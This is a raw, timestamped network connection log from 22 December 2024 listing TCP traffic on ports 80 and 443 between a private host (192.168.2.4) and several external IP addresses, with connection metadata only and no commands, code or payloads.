Dec 22, 2024 02:16:38.270757914 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.270792961 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.272629023 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.272702932 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.272716999 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.272768021 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.274528027 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.274610043 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.274614096 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.274668932 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.276333094 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.276391029 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.276398897 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.276447058 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.278147936 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.278219938 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.278249979 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.278301001 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.280019999 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.280077934 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.280112028 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.280164957 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.281864882 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.281919003 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.282151937 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.282205105 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.283721924 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.283783913 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.283874035 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.283931017 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.285629988 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.285737991 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.285742044 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.285788059 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.287475109 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.287528992 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.287528992 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.287595034 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.289300919 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.289362907 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.289428949 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.289483070 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.291169882 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.291224003 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.291249037 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.291280985 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.309884071 CET	49831	443	192.168.2.4	104.21.67.146
Dec 22, 2024 02:16:38.309895039 CET	443	49831	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:38.339682102 CET	443	49831	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:38.339736938 CET	49831	443	192.168.2.4	104.21.67.146
Dec 22, 2024 02:16:38.339742899 CET	443	49831	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:38.382226944 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.382281065 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.382488966 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.382488966 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.382662058 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.382713079 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.382781029 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.382858038 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.384036064 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.384145975 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.384174109 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.384213924 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.385365963 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.385415077 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.385462999 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.385509014 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.386718988 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.386765003 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.387126923 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.387176037 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.388072968 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.388125896 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.388209105 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.388259888 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.389393091 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.389440060 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.389518023 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.389564991 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.390697956 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.390742064 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.390806913 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.390852928 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.392013073 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.392070055 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.392103910 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.392149925 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.393309116 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.393352032 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.393429995 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.393481970 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.394561052 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.394628048 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.394690990 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.394750118 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.395895004 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.395951033 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.396050930 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.396104097 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.397118092 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.397172928 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.397222042 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.397272110 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.398366928 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.398422003 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.398484945 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.398541927 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.399624109 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.399679899 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.399759054 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.399812937 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.400863886 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.400918007 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.401012897 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.401057959 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.402060986 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.402118921 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.402184010 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.402230024 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.403278112 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.403331041 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.403388977 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.403436899 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.404578924 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.404639959 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.404684067 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.404738903 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.405683994 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.405730009 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.405803919 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.405852079 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.406898975 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.406945944 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.406949997 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.407001972 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.408070087 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.408114910 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.408206940 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.408251047 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.409245968 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.409296036 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.409332037 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.409373999 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.410429001 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.410474062 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.410552979 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.410598040 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.411547899 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.411592007 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.411715984 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.411767006 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.412739992 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.412789106 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.412854910 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.412904978 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.413706064 CET	443	49831	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:38.413747072 CET	49831	443	192.168.2.4	104.21.67.146
Dec 22, 2024 02:16:38.413777113 CET	443	49831	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:38.413955927 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.414009094 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.414071083 CET	443	49831	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:38.414119005 CET	49831	443	192.168.2.4	104.21.67.146
Dec 22, 2024 02:16:38.414242983 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.414290905 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.415033102 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.415132046 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.415150881 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.415201902 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.416174889 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.416229010 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.416286945 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.416343927 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.417294979 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.417350054 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.417398930 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.417460918 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.418451071 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.418502092 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.418572903 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.418625116 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.419604063 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.419667959 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.419728041 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.419780970 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.420748949 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.420799971 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.420867920 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.420913935 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.421895981 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.421931982 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.421947002 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.422004938 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.423028946 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.423079967 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.423155069 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.423199892 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.424180031 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.424227953 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.424313068 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.424374104 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.425316095 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.425410986 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.425437927 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.425487995 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.426466942 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.426517963 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.426578045 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.426629066 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.427592039 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.427640915 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.427714109 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.427762985 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.428766966 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.428817987 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.428855896 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.428898096 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.429893970 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.429946899 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.429951906 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.430001974 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.431025982 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.431078911 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.431176901 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.431230068 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.432688951 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.432723999 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.432734013 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.432769060 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.433360100 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.433413029 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.433469057 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.433526039 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.434468985 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.434518099 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.435408115 CET	49831	443	192.168.2.4	104.21.67.146
Dec 22, 2024 02:16:38.435431004 CET	443	49831	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:38.435446024 CET	49831	443	192.168.2.4	104.21.67.146
Dec 22, 2024 02:16:38.435451984 CET	443	49831	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:38.655158997 CET	443	49832	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:38.655236959 CET	443	49832	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:38.655306101 CET	49832	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:38.658526897 CET	49832	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:38.658569098 CET	443	49832	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:38.972692013 CET	49837	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:38.972785950 CET	443	49837	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:38.972883940 CET	49837	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:38.973762035 CET	49837	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:38.973839045 CET	443	49837	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:40.187674046 CET	443	49837	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:40.187886953 CET	49837	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:40.189188004 CET	49837	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:40.189244032 CET	443	49837	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:40.189517975 CET	443	49837	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:40.193739891 CET	49837	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:40.193739891 CET	49837	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:40.193836927 CET	443	49837	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:40.193943024 CET	49837	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:40.193979025 CET	443	49837	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:40.940994978 CET	49824	80	192.168.2.4	185.215.113.43
Dec 22, 2024 02:16:40.942157984 CET	49842	80	192.168.2.4	185.215.113.43
Dec 22, 2024 02:16:41.061327934 CET	80	49824	185.215.113.43	192.168.2.4
Dec 22, 2024 02:16:41.061378956 CET	49824	80	192.168.2.4	185.215.113.43
Dec 22, 2024 02:16:41.061990976 CET	80	49842	185.215.113.43	192.168.2.4
Dec 22, 2024 02:16:41.062165022 CET	49842	80	192.168.2.4	185.215.113.43
Dec 22, 2024 02:16:41.062256098 CET	49842	80	192.168.2.4	185.215.113.43
Dec 22, 2024 02:16:41.175697088 CET	443	49837	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:41.175767899 CET	443	49837	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:41.175856113 CET	49837	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:41.175945997 CET	49837	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:41.175985098 CET	443	49837	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:41.182009935 CET	80	49842	185.215.113.43	192.168.2.4
Dec 22, 2024 02:16:41.754543066 CET	49843	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:41.754636049 CET	443	49843	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:41.754714012 CET	49843	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:41.755213022 CET	49843	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:41.755266905 CET	443	49843	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:41.821017981 CET	49844	443	192.168.2.4	104.21.67.146
Dec 22, 2024 02:16:41.821058989 CET	443	49844	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:41.821130991 CET	49844	443	192.168.2.4	104.21.67.146
Dec 22, 2024 02:16:41.821959972 CET	49844	443	192.168.2.4	104.21.67.146
Dec 22, 2024 02:16:41.821971893 CET	443	49844	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:42.141587973 CET	49846	80	192.168.2.4	212.193.31.8
Dec 22, 2024 02:16:42.261303902 CET	80	49846	212.193.31.8	192.168.2.4
Dec 22, 2024 02:16:42.261435032 CET	49846	80	192.168.2.4	212.193.31.8
Dec 22, 2024 02:16:42.261593103 CET	49846	80	192.168.2.4	212.193.31.8
Dec 22, 2024 02:16:42.381190062 CET	80	49846	212.193.31.8	192.168.2.4
Dec 22, 2024 02:16:42.398740053 CET	80	49842	185.215.113.43	192.168.2.4
Dec 22, 2024 02:16:42.400597095 CET	49842	80	192.168.2.4	185.215.113.43
Dec 22, 2024 02:16:42.402025938 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:42.402199030 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:42.522735119 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:42.523083925 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:42.523189068 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:42.523338079 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:42.523310900 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:42.643259048 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:42.966989994 CET	443	49843	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:42.967083931 CET	49843	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:42.973860979 CET	49843	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:42.973916054 CET	443	49843	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:42.974184036 CET	443	49843	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:42.979159117 CET	49843	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:42.979231119 CET	49843	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:42.979264021 CET	443	49843	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:43.035660982 CET	443	49844	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:43.035757065 CET	49844	443	192.168.2.4	104.21.67.146
Dec 22, 2024 02:16:43.036911011 CET	49844	443	192.168.2.4	104.21.67.146
Dec 22, 2024 02:16:43.036921024 CET	443	49844	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:43.037143946 CET	443	49844	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:43.038270950 CET	49844	443	192.168.2.4	104.21.67.146
Dec 22, 2024 02:16:43.038439035 CET	49844	443	192.168.2.4	104.21.67.146
Dec 22, 2024 02:16:43.038467884 CET	443	49844	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:43.038547993 CET	49844	443	192.168.2.4	104.21.67.146
Dec 22, 2024 02:16:43.038563013 CET	443	49844	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:43.848618984 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:43.848639011 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:43.848658085 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:43.848701000 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:43.848737955 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:43.848788977 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:43.848807096 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:43.848824024 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:43.848841906 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:43.848855972 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:43.848875046 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:43.848902941 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:43.849088907 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:43.849131107 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:43.849175930 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:43.849215031 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:43.849267960 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:43.849308968 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:43.968723059 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:43.968744993 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:43.968786001 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:43.968806982 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:43.972686052 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:43.972728968 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:43.972855091 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:43.972904921 CET	49851	80	192.168.2.4	31.41.244.11
